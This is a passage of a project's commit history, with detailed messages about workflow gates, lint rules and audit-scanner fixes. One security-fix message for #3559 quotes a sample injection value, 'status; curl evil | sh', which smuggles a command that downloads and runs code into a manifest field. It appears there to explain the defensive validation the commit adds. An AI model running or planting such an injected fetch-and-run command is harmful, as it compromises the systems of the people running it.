Commit Graph

303 Commits

Author SHA1 Message Date
Tom Boucher
fba3b9c24f fix(#3559): dispatch every ship:pre capability gate, not two hardcoded capIds (#3608)
* test(3559): failing-first coverage for generic ship:pre gate dispatch

ship.md's preflight resolves every active ship:pre gate then enforces exactly two
hardcoded capability IDs, so a third-party capability's blocking gate is resolved,
evaluable, and silently dropped. These tests fail on that dispatch dead-end and
pin the generic evaluator contract the fix will drive.

* fix(3559): dispatch every ship:pre gate generically, not two hardcoded capIds

ship.md's preflight resolved every active ship:pre gate via render-hooks and then
enforced exactly two capability IDs — security and broken-windows. Every other
capId, including any third-party capability's blocking gate, was resolved,
evaluable, and silently dropped: a phase shipped past its own declared failing
gate with nothing evaluated and nothing warned.

Preflight now iterates every active kind=="gate" entry in array order, dispatching
by check shape through the generic evaluator (gsd_run check predicate, ADR-2008)
and honoring each gate's own blocking and onError — the contract execute:wave:post,
execute:post and plan:post already implement and references/loop-hook-dispatch.md
already specifies. docs/how-to/command-exit-zero-gate.md already documented ship:pre
as auto-dispatching, so this restores documented behavior rather than changing it.

security and broken-windows are retained verbatim as named specializations INSIDE
the loop, so their bespoke fail-closed reads are unchanged and every gate is visited
exactly once — no double-enforcement is representable.

Also corrects two CONTEXT.md predicates that described the hardcoded shape, and the
test file's header note claiming ship:pre has no runnable evaluator (stale since #2008).

Fixes #3559

* fix(3559): validate third-party gate checks in-context before any shell use

Adversarial + security review of the generic dispatch arm this PR introduces.

SECURITY (introduced by this PR): the new every-other-capId arm is the first path
on which a THIRD-PARTY capability manifest string reaches a shell at ship:pre —
before it, dispatch never left the two first-party arms. gates[].check is not one
of the four executable surfaces the install consent prompt discloses (hooks,
command modules, mcpServers, reviewer lanes), so a capability can be consented to
as declarative-only and still reach a shell here. An unvalidated check.query of
'status; curl evil | sh' would be interpolated straight into a command
substitution. The arm now carries the same in-context validation contract
loop-hook-dispatch.md already mandates for ref.command, and the predicate arm is
specified as a single argv element so an apostrophe cannot close the literal.

TESTS: the first-cut regression tests only asserted that the shared loop phrase and
the evaluator substrings co-occurred. A partial regression that kept the phrase but
deleted the default arm would have passed them. Added a structural assertion that a
distinguishable catch-all arm exists, comes after every named branch, and is where
the generic evaluator is actually invoked.

REFERENCE DRIFT: loop-hook-dispatch.md documented onError as skip/'fail', but the
generated registry, all 35 manifest declarations, and all four dispatch sites use
skip/halt — 'fail' appears nowhere. Corrected, since this PR newly cites that doc
as ship.md's authority.

Also notes the named-query arg convention's provenance (mirrors verify:pre verbatim;
no capability declares a ship:pre query gate today).

* fix(3559): close the same gate-check injection at all four sibling dispatch sites

Maintainer directed fixing the sibling sites inline rather than filing them.

The command-injection surface fixed at ship:pre is a FAMILY property, not a site
property: every workflow that interpolates a manifest-supplied check.query into a
shell command substitution has it. Root cause is in the contract, not the sites —
references/loop-hook-dispatch.md mandates in-context validation for step ->
ref.command and OMITS the same requirement for gate, so all four gate consumers
inherited an unstated rule.

Closed at the source (the reference's gate section now carries the rule) and at
every consumer:
  execute-phase.md  execute:wave:post, execute:post
  plan-phase.md     plan:post
  verify-work.md    verify:pre
  ship.md           ship:pre  (already hardened in a2d84a77)

TESTS: section 6 enumerates the family by DISCOVERY, not by a hardcoded list, so a
new dispatch site added later without the validation contract fails instead of
shipping — the same 'hardcoded list silently misses members' mistake #3559 itself
was. It asserts, per discovered site, that the charset is pinned, that validation is
specified as in-context, and that the rule appears BEFORE the interpolation it
guards (an executing agent reads top-down). A floor assertion fails the section if
the discovery regex ever stops matching, so it cannot pass vacuously. Two further
tests pin the reference's gate section and the halt/skip onError vocabulary.

Sizes all within tier caps: execute-phase 94378/98304, plan-phase 91008/98304,
verify-work 39488/61440, ship 38067/40960. Drift acks amended for each.

* fix(3559): fit the validation mandate under the frozen pre-phase-6 ceiling

The previous commit blew tests/claude-orchestration.test.cjs's frozen ADR-857
pre-phase-6 ceiling for execute-phase.md (93600): the file had only 209 bytes of
headroom and the inline validation paragraph added 987. That ceiling is a ratchet
proving Phase 6 extraction happened — raising it is never the answer.

Restructured so the RULE lives once, in the reference's gate section (charset,
in-context, single-argv, and the consent-surface rationale), and each of the five
dispatch sites carries a terse mandate plus a pointer to it. That is strictly better
than five verbatim restatements: this PR exists partly because the reference and its
implementations had already drifted apart on the onError vocabulary, and five copies
of a security rule is that same failure waiting to recur. execute-phase.md already
eagerly inlines the reference (@-form at its step-hook dispatch), so an executing
agent has the full rule in context regardless.

Also reclaimed genuinely duplicated bytes at the execute:post site, whose prose
restated both commands the fenced block immediately below already shows, and whose
tail restated the two-step contract that the execute:wave:post site spells out in
full.

Net sizes vs origin/next:
  execute-phase.md  93365  (-26, SHRINKS)  pre-phase-6 93600, margin 235 (was 209)
  plan-phase.md     90627  (+111)          tier cap 98304
  verify-work.md    39107  (+111)          tier cap 61440
  ship.md           36784  (+3058)         tier cap 40960

Because execute-phase.md now shrinks, its drift-ack entry was reverted — an ack that
is never consumed is reported as STALE and fails the check. The other three acks
carry corrected byte figures.

Tests follow the same split: section 6 asserts the mandate + pointer per discovered
site and the full rule in the reference; section 5's security test drops the inline
charset assertion it can no longer make of ship.md.

* fix(3559): repair an over-escaped regex in the security assertion

/loop-hook-dispatch\\.md/ matched a literal backslash before .md, so it could never
match and the [security] assertion failed on the remote runner even though the prose
it checks was correct. The over-escaping came from nesting a regex through a shell
string into a node -e script; the sibling literal in section 6, written via a quoted
heredoc, was unaffected.

The reason this reached the runner at all is that the local check re-typed the regex
by hand instead of executing the one in the file, so it validated a different pattern
than the test used. Replaced that habit with two harnesses that read the literals FROM
the source: one asserts every regex literal in the file matches something in the real
workflow/reference corpus (catching over-escaping generically), the other evaluates
the [security] and section-6 literals against their actual targets.

* chore(3559): backfill changeset PR number (#3608)

---------

Co-authored-by: sim <sim@local>
2026-08-17 22:28:05 -04:00
Tom Boucher
5f64d999dc fix(#3586): warn when .planning/ is gitignored but still tracked (#3598)
* feat(#3586): warn when .planning/ is gitignored but still tracked

git ignore rules have no effect on files git already tracks, so a project
that committed .planning/ before ignoring it keeps staging those files --
while commit_docs correctly resolves to false, which is exactly what makes
the contradiction invisible.

The probe lives in the SNAPSHOT BUILDER, not the rule: Rule.check may perform
no ambient I/O (ADR-3180 8.1 rule 1, enforced by lint-planning-snapshot-bypass).
buildPlanningTrackedField follows buildWorktreeHealthField's precedent --
injected execGit, bounded, degrading to UNREADABLE with a typed reason rather
than throwing. W024 went inline instead only because no snapshot field carried
its fact; that precondition does not apply here.

W029 fires only on COMPLETE scope with ignored and tracked both true, so a
degraded probe yields neither a finding nor a false all-clear, and the default
project (tracked, not ignored) stays silent. The remedy is ADVISE-only --
--repair never untracks anything.

* docs(#3586): document W029 and correct the health rule count

CONFIGURATION.md documented the gitignore auto-detect without the caveat that
ignore rules do not affect already-tracked files -- the very gap W029 exists to
surface. Adds the caveat, the warning, its remedy, and why --repair will not
act on it.

CONTEXT.md's rule count was stale at 31 before this change (actual 32 through
W028); corrected to 33 and pointed at the two other places the count is locked,
so the next editor updates all three together.

* fix(#3586): treat ls-files overflow as tracked, add CLI-level W029 tests

Review findings.

Security (minor, confirmed): execGit sets no maxBuffer, so Node's 1MB default
applies to git ls-files. A .planning/ tree large enough to overflow it failed
into git_list_failed and silenced W029 -- a false negative in exactly the
large-history case most likely to have the real bug. Overflow is now treated
as PROOF of tracking (the output was non-empty by definition) and resolves to
tracked:true, scope COMPLETE, reason ok_truncated.

Spec (major): test-matrix rows C1 and C2 were never implemented -- there was no
CLI-level integration test at all, only rule-level ones. Both now drive the real
validate-health dispatch and confirm W029 is reachable end-to-end.

Known limit documented, not papered over: a deliberate git add -f under an
otherwise-ignored .planning/ raises the same signal as the accidental case.
There is no reliable way to tell them apart, the finding is advisory-only, and
a heuristic that cannot actually distinguish them would be worse than the
honest caveat.

* test(#3586): update frozen health-doc counts and acknowledge health.md growth

The remote matrix caught three gates that lint:ci does not cover.

gen-health-docs.test.cjs froze a 35-row / 32-rule assertion; W029 makes it
36/33. Updated both the assertion and the test NAME, which embeds the counts --
a stale name is a lie even when the assertion passes. The second reported
failure was the same assertion surfacing at describe-rollup granularity, not a
distinct bug.

emitted-attribution's growth arm needed an ack for the generated health.md.
health.md was already named in 3309-health-docs-generated.json, and two ack
sources naming one path is a hard error -- so a new fragment was not an option.
That fragment's own history shows the pattern: #3309 created it, #2873 amended
it in place for W028. Amended again for W029, with a note recording why this
one file is amended rather than joined by a sibling.

* docs(#3586): add the private-planning how-to and fix a wrong link

docs/CONFIGURATION.md pointed 'Configure private planning' at
how-to/configure-model-profiles.md -- an unrelated page -- and no
private-planning how-to existed at all. Found while editing that section.

The how-to test genuinely fires here: going private is four steps and crosses
planning.search_gitignored, a setting owned by another concern, so a reference
table structurally cannot carry it. The new page walks the whole sequence and
leads with the step people miss -- .gitignore does not untrack what git already
tracks -- which is the exact state W029 now detects.

Also corrects 'artefacts' to 'artifacts' (repo house style is American).

* chore(#3586): backfill changeset pr number to 3598

---------

Co-authored-by: sim <sim@local>
2026-08-17 15:56:46 -04:00
Tom Boucher
ec7e49a64c fix(#3576): repair all 43 dead references/ cites and gate the canonical resolvable form (#3596)
* test(#3576): gate shipped reference citations on the canonical resolvable form

Failing-first gate for #3576: a backticked bare references/<name>.md cite
resolves from no install location (agents, workflows, and references all
install where a bare relative references/ path is dead). The gate walks the
runtime-loaded trees the issue prescribes, strips @~/ include tokens
PER-TOKEN (a line-skip guard would miss a bare cite sharing a line with an
include — the issue-named trap), pins the genuinely relative ../ href and
canonical forms as non-offenders, and checks canonical cite targets exist.
43 offenders today across 19 files.

* fix(#3576): repair all 43 dead references/ cites to the canonical resolvable form

Every backticked bare references/<name>.md cite across the 19 shipped files
rewritten to gsd-core/references/<name>.md — the form every required_reading
block and @~/ include already uses, and the only form that resolves from any
install location. All 20 cited targets verified to exist; the one genuinely
relative href (plan-phase.md's ../references/mvp-concepts.md) is untouched
(the repair is backtick-anchored). Growth acks: new fragment for the three
first-time paths, #3206-pattern appends to the five fragments already naming
the other grown files (two ack sources may never name the same path).
execute-phase.md lands at 93,391/93,400 and gsd-executor.md at 49,150/49,152
— exactly the issue's projections; every repair fits.

* fix(#3576): drop stale default.md growth ack (nested modes file is hash-attributed, not growth-ratcheted)

Review finding: the emitted-attribution ratchet covers only top-level
workflows/ + agents/ files; discuss-phase/modes/default.md's delta is
source-attributed, so acknowledging its growth is a stale entry the
differential lane fails on.

* chore(#3576): add changeset fragment

* chore(#3576): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-17 15:24:24 -04:00
Tom Boucher
98ecb2ba8c enhance(#2142): archive quick tasks at milestone close-out (#3592)
* test(#2142): failing-first coverage for quick-task archival at milestone close-out

* enhance(#2142): archive quick tasks at milestone close-out

* fix(#2142): resolve review findings — readme injection, move/reset ordering, owned state write

* fix(#2142): fold archival under milestone namespace, expose index IR, dedupe reset decision

* test(#2142): assert archive-dir-relative summary path in index IR

* docs(#2142): backfill changeset pr number to 3592

* test(#2142): skip newline-fixture injection test on windows (control chars illegal in path names)

---------

Co-authored-by: sim <sim@local>
2026-08-17 14:51:00 -04:00
Tom Boucher
7c649a9970 fix(#3585): close raw-git bypasses of the commit_docs gate (#3590)
* test(#3585): repo-wide guard for unguarded .planning/ git add

Replaces the two-file #1783 scan, which required .planning/ on the git add
line and so was structurally blind to fast.md's `git add -A` and to
new-milestone.md (never scanned).

Extracts the shell tokenizer, comment-position rule and gsd-scan-ignore
marker from the #2269 guard into tests/helpers/shipped-command-scan.cjs so
both guards consume one implementation. Commit-specific logic stays in
commit-files-pathspec.test.cjs; every pre-existing test there passes
unedited.

Fails RED on five sites: fast.md:58, new-milestone.md:262, spec-phase.md:480,
eval-review.md:148, ai-integration-phase.md:263. The last three carry a
markdown prose conditional outside the bash block it claims to guard.

* fix(#3585): close raw-git bypasses of the commit_docs gate

Five shipped workflow steps staged .planning/ with raw git. Two had no
check at all; three had a markdown prose conditional sitting outside the
bash block it claimed to guard, so the block ran unconditionally.

spec-phase, eval-review and ai-integration-phase now route through the
gsd_run query commit seam, which performs the commit_docs and gitignore
checks internally and returns a skipped envelope -- this deletes the raw
git pair rather than wrapping it.

new-milestone stages directories for a later commit and cannot use the
seam, so it takes the executable guard form, fail-open on a tooling error.

fast writes no planning artifacts and has no gsd_run in scope at that
point, so it excludes .planning via pathspec instead of reading config.

Guard now reports 0 offenders.

* test(#3585): pin skipped_gitignored to production behavior

COMMIT_REASON was a test-local frozen enum joined to production only by a
hand-maintained keep-in-sync comment -- the Generative Fix Divergence class,
whose required remedy is a parity assertion.

B1-B3 already pinned SKIPPED_COMMIT_DOCS_FALSE. SKIPPED_GITIGNORED was
pinned by nothing: production could rename it and every test still passed.

G1-G3 drive the gitignore auto-detect path and assert the canonical reason.
The fixture must OMIT .planning/config.json entirely -- with config.json
present the loader resolves commit_docs to false first and cmdCommit returns
skipped_commit_docs_false, never reaching its own isGitIgnored branch.

* docs(#3585): document the planning commit gate and its guard

CONTEXT.md had zero commit_docs entries. Adds a Planning Commit Gate
glossary entry covering the resolution chain, the typed skip envelope, the
measured ordering of the two reason codes, and why the gate is enforceable
only as a text guard.

CONTRIBUTING.md gains the contributor rule for the new guard, with the
prose-is-not-a-guard example that caused three of the five defects.

* fix(#3585): address review findings in the planning-add guard

Spec review (blocker): fast.md excluded .planning unconditionally, changing
behavior for commit_docs=true users and violating epic AC4. Now gated -- the
launcher preamble was MOVED from log_to_state into the commit block rather
than copied, so gsd_run is in scope for +4 lines instead of +4KB, and the
else branch is byte-identical to the previous git add -A.

Security review (major): git -C <dir> add was a false negative because the
flag-skip loop never modelled flags that consume a separate value. Fixed for
-C/-c/--git-dir/--work-tree/--namespace. The fail-closed rule now also covers
$(...) substitution args and --pathspec-from-file, which were opaque in the
same way $VAR is. git commit -a/-am is now classified as reaching, since it
stages every tracked modification.

Self-review: isSkippable treated any NAME= token as a skippable prefix, so
V=$(git add -A) escaped -- the exact divergence the shared-helper extraction
existed to prevent. Adopted the sibling predicate verbatim.

eval, xargs, one-line function bodies and line-continuation remain blind and
are now enumerated as declared limits in the guard docblock and CONTRIBUTING.
The ifDepth clamp is defensive only: a 200k-case differential fuzz found no
reproducing input, so its test is labeled a pin, not a failing-first test.

* test(#3585): acknowledge emitted growth in three workflow files

emitted-attribution has two arms: hash attribution AND per-file growth. The
growth arm needs an acknowledgment even when every moved byte is attributable
to the diff, which is why the first remote run went red on it.

fast.md +417: the launcher preamble moved into the commit block so gsd_run is
in scope for the commit_docs guard, plus the guard itself.
new-milestone.md +281: the executable guard plus one line recording that the
unstaged archive move is deliberate.
spec-phase.md +21: reworded prose describing the skipped envelope.

eval-review.md and ai-integration-phase.md shrank; no entry needed.

* test(#3585): drop duplicate spec-phase ack, shrink its prose instead

The base already acknowledges spec-phase.md (from #2733), and two ack sources
may never name the same path. But a base-side ack is SPENT -- it cannot clear
new growth -- so the two gates were in direct conflict: attribution wanted an
ack, the ack lint forbade one.

Resolved by removing the growth rather than the conflict. spec-phase.md's +21
was purely a prose reword; rewritten shorter, the file now shrinks 36 bytes
against base and needs no acknowledgment at all.

fast.md and new-milestone.md have no base ack and keep theirs.

* chore(#3585): backfill changeset pr number to 3590

---------

Co-authored-by: sim <sim@local>
2026-08-17 13:34:55 -04:00
Tom Boucher
c5b83cb050 chore(#3560): delete two unreachable workflows, gate workflow reachability in lint (#3564)
* chore(#3560): delete two unreachable workflows, gate reachability in lint

discovery-phase.md and plan-milestone-gaps.md shipped to all 19 runtime
install trees with no command, agent, or skill referencing them.
plan-milestone-gaps' command was deleted by #2790 and the workflow was
left behind; discovery-phase's own header claimed a caller in
plan-phase.md's mandatory_discovery step, and that step does not exist —
plan-phase.md contains zero occurrences of "discovery".

docs/INVENTORY.md asserted discovery-phase.md was an alternate entry for
/gsd-new-project. new-project.md never referenced it. The row and the
matching note sentence are removed across all five locales rather than
corrected.

Adds rule 6 to lint-command-contract: every shipped workflow must be
reachable from a loader, walking the transitive closure over the three
reference shapes this repo uses. The closure seeds ONLY from
commands/agents/skills, so a workflow that references only itself and a
pair that reference only each other are both correctly reported rather
than satisfying themselves; a visited set makes reference cycles
terminate. The measure is a mention in a LOADER — docs/ and install-tree
fixtures deliberately do not count, because scan.md proved a file can be
documented and shipped while entirely unreached.

Ships blocking, not report-only: #3561 is in this branch's base, so the
tree reports 0 unreachable from the start.

Closes #3560

* test(#3560): drive rule 6 end-to-end, sweep a stale allowlist, update ADR-0002

Review findings.

Rule 6 had no end-to-end coverage: the tests exercised the pure closure
with in-memory data, so the wiring — file collection, exit code,
diagnostic — was unproven, and #3560's acceptance list explicitly wants
a fixture showing the rule FAILS on a planted orphan. Adds an optional
--root to lint-command-contract (default behavior unchanged) and four
tests driving the real CLI through the process seam against a temp
fixture: clean=0, planted orphan=1, orphan referenced only from docs/=1,
orphan reachable transitively=0. The docs/ case is what pins the
Goodhart defense — a mention outside a loader must not confer
reachability.

Deletes two tests that were byte-identical to a third and could not
assert anything loader-specific, since the closure is source-agnostic by
design; that distinction lives in the lint script's file collection and
is now covered above.

Removes a stale ALLOWLIST entry for discovery-phase.md in
planner-language-regression — the exact sweep-miss class rule 6 exists
to catch, found in the PR that adds the rule.

ADR-0002 described five per-file frontmatter checks; rule 6 is a
repo-level reachability graph, so the Decision section now says so.

Refs #3560

* test(#3560): cut the bug-3298 test pin on the deleted plan-milestone-gaps workflow

The remote runner went red with four failures: tests/phase.test.cjs
asserted the plan-milestone-gaps workflow exists and checked its mkdir
patterns, so deleting the file broke the test that pinned it. This is the
fence the epic describes — the content-sync test IS what keeps an
unreachable file alive — and cutting the coupling is what makes the
deletion safe.

Removes only that arm. The bug-3298 block guards three workflows against
phase-dir prefix drift; the import and add-backlog arms and both shared
mkdir-pattern helpers are untouched.

Worth recording where the sweep failed: my reachability walk covered
commands, agents, skills, gsd-core and docs, and lint-removed-but-needed
covers .github/workflows, gsd-core, docs and package.json. Neither looks
at tests/, so a test-pinned deletion is invisible to both and surfaces
only on the remote runner. The how-to added by this PR names that gap
explicitly so the next deletion searches tests/ by hand.

Refs #3560

* docs(#3560): add a how-to for resolving unreachable-workflow findings

* chore(#3560): backfill changeset pr number to 3564

---------

Co-authored-by: sim <sim@local>
2026-08-15 23:29:30 -04:00
Tom Boucher
1591454357 feat(#3409): reject shell guards that cannot observe their own failure arm (#3558)
* test(#3409): failing-first regression tests for unreachable shell guard arms

Drives the three live defects fail-first, executing the shipped workflow
snippets rather than a re-typed copy:

- G1/G2 plan-phase.md Walking Skeleton gate reads `--pick summaries_total`,
  a field that does not exist, so PRIOR_SUMMARIES is always "" and the gate
  has never fired (#3365). G2 is the load-bearing negative-space case: it
  rejects a fix that treats "no answer" as "zero" and fires unconditionally.
- G3 plan-phase.md PHASE_REQ_IDS resolves "" instead of the TBD sentinel on
  a phase with zero requirements.
- G4 complete-milestone.md's bare `cat <glob>` blocks on stdin under a
  nullglob left set by an earlier block (measured hang).

Skipped on Windows for G4 only: the FIFO-blocked-stdin mechanism is POSIX
only, and a weakened assertion there would pass vacuously.

Refs #3409

* fix(#3409): make nine shell guards observe their own failure arm

`--pick` coerces a missing field to empty string and exits 0, so the
`|| echo <default>` fallback after it fires only on a verb typo, never on
the field absence it was written for. Nine sites relied on that arm.

- plan-phase.md walking-skeleton gate: `--pick summaries_total` names a
  field that does not exist under any flag combination, so the gate has
  never fired on any project (#3365). Repointed at the existing single
  owner, `phases.list --type summaries --pick count`, which returns a real
  integer in every case including a project with no `.planning` directory.
  No new counter is added: a second one would duplicate the ownership
  ADR-3180 Decision 1 forbids. The gate now fires only on a literal "0",
  so an unanswerable query fails safe instead of entering skeleton mode.
- plan-phase.md phase_req_ids: now falls back to the documented TBD.
- The remaining seven convert to an explicit empty test.
- complete-milestone.md read all phase summaries through a bare
  `cat <glob>`; under a nullglob left set by an earlier block that is zero
  operands, so cat blocks on stdin. Guarded with the array shape the
  #3300 fix already established in review.md.

Refs #3409

* fix(#3409): guard eleven more globs that defeat their own fallback arm

The nullglob audit this issue asks for turned up the same class in files
#3300 never touched.

- Eight bare `cat <glob>` reads (transition, complete-milestone, planner x4,
  verifier, phase-researcher). With nullglob set that is zero operands, so
  cat reads stdin and blocks; measured rc=137 at 3s.
- Three `ls <glob> || echo "<message>"` sites (session-report,
  review-backlog and its generated skill). nullglob makes ls succeed
  listing the cwd, so the message never prints and the user gets a
  directory listing instead.

Guarded with `[ -e "${_ARR[0]}" ]` rather than `[ ${#_ARR[@]} -gt 0 ]`.
The count form is correct only when nullglob is set, and six of these
seven files never set it: without it the array holds the unmatched literal
pattern, so the count is 1 and the guard passes wrongly. `-e` is correct
in both worlds. review.md keeps its count guards — that block sets
nullglob two lines above them.

skills/gsd-review-backlog regenerated from commands/, never hand-edited.

Refs #3409

* feat(#3409): add the unreachable-shell-guard drift lint

A sibling of lint-planning-prompt-drift.cjs, consuming the shared
scripts/lib/drift-scan.cjs rather than copying it, wired into lint:ci.

Both detectors are one shape — a fallback arm defeated by a legitimate
success-on-empty:

- Detector A: `--pick` and `|| echo` on one line. `--pick` is the
  discriminator because "missing field renders empty at exit 0" is a
  documented CLI contract, not a heuristic. A rule keyed on gsd_run
  matched 111 lines, ~132 of them legitimate, and was rejected.
- Detector B: `cat <glob>` in command position, and `ls <glob>` whose
  exit code feeds a real fallback or an if/while head. Informational
  `ls <glob>` whose stdout is consumed (97 sites) and `|| true` failure
  suppression (~15) are not guards and never fire.

Shrink-only ratchet keyed on (file, trimmed text) with a per-pair count,
POSIX-normalized unconditionally so Windows CI cannot report everything
fresh and stale at once. Ships with a ZERO-entry baseline: every site it
can find is fixed. Exemption is the per-line `# gsd-scan-ignore: #NNN`
marker whose reason must name an issue or URL; a malformed reason reports
a distinct error rather than silently exempting. No file allowlists.

ADR-3409 records the invariant, the measurements behind both detectors,
and why the upstream `--pick` contract fix belongs to #3473.

Refs #3409

* fix(#3409): resolve review findings — typed surface, sanitized reports, tighter marker

Standards axis (blocker): the guard's tests asserted on human-readable
stdout/stderr and on free-form baseline-load prose, which CONTRIBUTING
prohibits by name. Added the typed surface it prescribes instead of
weakening the tests: a frozen REASON enum, a --json report mode,
structured loadBaseline errors, and a test locking Object.keys(REASON)
so a new reason stays three coordinated changes.

Security axis: sanitizeForReport covered every violation field but not
the baseline-load error path, which embeds raw JSON.stringify output --
that escapes nothing above 0x1f, so bidi and C1 controls reached CI logs
unfiltered. Routed through the sanitizer at the output seam.

Security axis: the scan-ignore marker accepted `#0` and a bare
`http://`. Tightened to a positive issue number and a URL with a host.
This diverges deliberately from the sibling in
tests/commit-files-pathspec.test.cjs, whose looser form was copied
verbatim; the header now records the divergence.

Security axis: G4 built its FIFO with `mktemp -u`, reserving a name
without creating it. Now created inside a `mktemp -d` directory.

Spec axis: ADR-3409 claimed a ninth site landed after the issue was
filed. git blame disproves it -- all nine predate it; the issue's hand
count missed one. Corrected. The design and test matrix still specified
B9 as a FLAG after implementation reversed it to PASS; both now record
the reversal and why.

Refs #3409

* docs(#3409): add the how-to for resolving unreachable-guard findings

Reference and Explanation are carried by ADR-3409; this is the
task-oriented quadrant CI cannot check for.

The page exists mainly for one thing the lint structurally cannot catch:
both `[ -e "${_ARR[0]}" ]` and `[ ${#_ARR[@]} -gt 0 ]` remove the glob
from the command and therefore both pass, but the count form is correct
only when nullglob is set — and nullglob is usually set in a different
block of the same file. A reference table cannot carry that; a how-to can.

Also documents the reason codes, so a reader can tell "nothing to report"
from "could not look".

No tutorial: this is a gate inside an existing CI loop, not a new entry
point a newcomer starts from.

Refs #3409

* fix(#3409): bring the touched prompt files back under their size gates

The remote run was red on 14 tests, all size/attribution, none of them
the regression suite.

- agents/gsd-planner.md was 194 chars over a 49152 cap enforced by four
  separate tests, each of which says the remedy is extraction, not a bump.
  It had 41 chars of headroom before this branch. Its `## Checkpoint
  Types` section was an unlinked, condensed duplicate of
  references/checkpoints.md, which already carries all three types and
  their XML shapes; the section now points there and keeps the three
  names and percentages inline. Net -969, margin 1010.
- gsd-core/workflows/execute-phase.md sat 2 chars under a comfortable
  margin assertion. Dropped the AUTO_MODE default: the `|| echo "false"`
  it replaced was unreachable, so the value was already sometimes empty
  on next, and its only consumer compares against `true`. Net -16.
  Left plan-phase.md's AUTO_CHAIN default alone -- that file names an
  explicit `false` branch, so empty would match neither branch.
- Acknowledged the seven prompt files that genuinely grew, one specific
  reason each. Five of those paths were already claimed by spent
  fragments identical to next, which blocks a second source naming the
  same path; removed just the colliding key from each, deleting the two
  that this emptied.

Refs #3409

* test(#3409): extract the whole PHASE_REQ_IDS block, not just its first line

G3 failed on the remote runner with '' !== 'TBD'. The test was wrong, not
the workflow.

The shipped contract is now two consecutive lines -- the capture and the
`${PHASE_REQ_IDS:-TBD}` default -- but the helper's `^PREFIX=.*$` regex
returns only the first match, so the test executed half the contract and
correctly observed the empty string. Renamed to extractAssignmentBlockFor
and taught it to consume the contiguous run of lines sharing the prefix.

The assertion is untouched: TBD is the right expectation, and weakening
it to accept the empty string would have reinstated exactly the class
this suite exists to catch -- a check that cannot observe the thing it
is checking.

extractFencedBashAfterAnchor is unaffected: it is fence-delimited rather
than line-anchored, so G1/G2/G4 still capture their full blocks.

Refs #3409

* chore(#3409): drop a spent ack fragment that collided on complete-milestone.md

#3458 landed on next while this branch was in flight and its fragment
claims complete-milestone.md, which this branch also grows. Two ack
sources may never name the same path.

Its entry is spent: the +9163 it explains is already absorbed at base, so
it can no longer clear anything, and the checker's own guidance for spent
entries is to delete them. Removing the key emptied the fragment, so the
file goes too -- an empty one signals nothing.

Refs #3409

* chore(#3409): backfill changeset pr number 3558

* test(#3409): hoist a regex subject out of exec() to clear the injection scan

CI's prompt-injection scan flagged `MARKER_RE.exec('# gsd-scan-ignore: ...')`.
The pattern `exec[[:space:]]*\(["']` is receiver-blind on purpose, so it
catches `require('child_process').exec('...')` -- and the scanner's own
header records that RegExp.prototype.exec is collateral, to be handled by
its allowlist.

Allowlisting the file would blind it to the real exec vector permanently,
so the subject is hoisted into a const instead: same assertion, scanner
left at full strength, no security surface widened.

Refs #3409

---------

Co-authored-by: sim <sim@local>
2026-08-15 21:09:05 -04:00
Tom Boucher
abf3cf7c25 fix(#3458): scan archived milestone phases, and make [A] Acknowledge actually suppress (#3555)
* fix(#3458): scan archived milestone phases in the four audit-open scanners

`query audit-open` resolved exactly one phase root, `.planning/phases/`. When a
milestone closes its phase directories move to
`.planning/milestones/v<X.Y>-phases/`, so an item still unresolved at that
moment — the `[R]/[A]/[C]` prompt accepts "accept" and "carry forward", not only
"resolve" — became invisible to the v1.1 pre-close audit and every audit after
it. The window in which an unresolved item is visible to this gate was exactly
one milestone wide, and nothing announced when it closed.

Reproduced before fixing, with byte-identical artifacts in the two layouts and
the active layout as the control:

  active   → has_open_items=true   deferred=1  uat_gaps=1  total=2
  archived → has_open_items=false  deferred=0  uat_gaps=0  total=0

`scanDeferredItems`' own doc comment names this as the thing it was built to
prevent — "phase directories archive to `milestones/vX.Y-phases/` (#1871) and
the entry leaves the live tree having never been triaged" — while the
implementation eleven lines below cannot read that path. It catches an entry at
its own milestone close and goes blind at precisely the transition the comment
describes.

This is not cosmetic under-reporting. `auditOpenArtifacts` sums all nine
category counts into `counts.total` and returns `has_open_items: counts.total >
0`, so four blind scanners can flip the gate's headline boolean and let
`/gsd-complete-milestone` assert a clean close it never verified. In a
fully-archived project `.planning/phases/` may not exist at all, and the
scanners' `if (!fs.existsSync(phasesDir)) return []` produced a value
indistinguishable from "nothing is open".

## One enumeration, not four

The four scanners each hand-rolled the same active-only walk. They now share
`listAuditPhaseTargets(planDir, cwd)`, which yields both roots — the shape of
fix epic #3473's B2 asks for, and the reason the fix is one seam rather than
four edits.

Three properties are load-bearing:

  * the ACTIVE enumeration is unchanged — still a raw `readdirSync`, NOT
    `listMilestonePhaseDirs`. These scanners are deliberately not
    milestone-filtered today, and switching would silently add window and
    sentinel filtering: a behavior change belonging to #3372, not here.
  * a missing or unreadable active root skips that half instead of returning
    early. That early return WAS the bug in a fully-archived project.
  * archived dirs are deliberately NOT milestone-filtered, per the comment
    `src/uat.cts` already carries: archived phases belong to past milestones by
    definition, so applying the current-milestone filter discards every one and
    silently reinstates this bug.

Each item now carries `archived_milestone` when it comes from a closed
milestone, matching how the sibling module already labels archived results —
without it an operator triaging `[R]/[A]/[C]` cannot tell a live item from one
carried over. Additive: no existing test or doc asserted an exact key set.

`scripts/lint-phase-enumeration-drift.cjs`'s exemption list for this file drops
from the four scanner names to the single helper, since that is now the only
place the enumeration lives.

## Tests

Written failing-first and confirmed red for the right reason before the fix, all
four driven through the real `audit-open` CLI rather than private functions:
archived-only (was 0/0/0/0 with `has_open_items=false`, now 1/1/1/1 true),
mixed active+archived (was 1/1/1/1 — the archived half dropped — now 2/2/2/2),
active-only unchanged, and an all-resolved archived phase contributing 0.

That last one passed vacuously before the fix, because the archived path was not
reached at all; it was re-verified as genuinely discriminating afterward by
flipping one archived item to unresolved and watching the count rise.

Closes #3458

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3458): restore the scan_error sentinel and show archive provenance

Adversarial review found one BLOCKER that the previous revision introduced,
which a green remote-runner suite did not catch because nothing in the tree
asserts `scan_error` at all.

## The regression

Consolidating four hand-rolled walks into `listAuditPhaseTargets` swallowed the
active-root `readdirSync` throw in a bare `catch {}`. Pre-fix each scanner
returned `[{scan_error: true, …}]`; after, each returned `[]`. Measured with
`.planning/phases` created as a FILE (so `existsSync` passes and `readdirSync`
throws ENOTDIR):

  before this fix: uat_gaps/verification_gaps/context_questions/deferred_items
                   each `[{"scan_error":true,…}]`
  the regression:  each `[]`

`complete-milestone.md` re-runs `audit-open --json` and reads those counts, so a
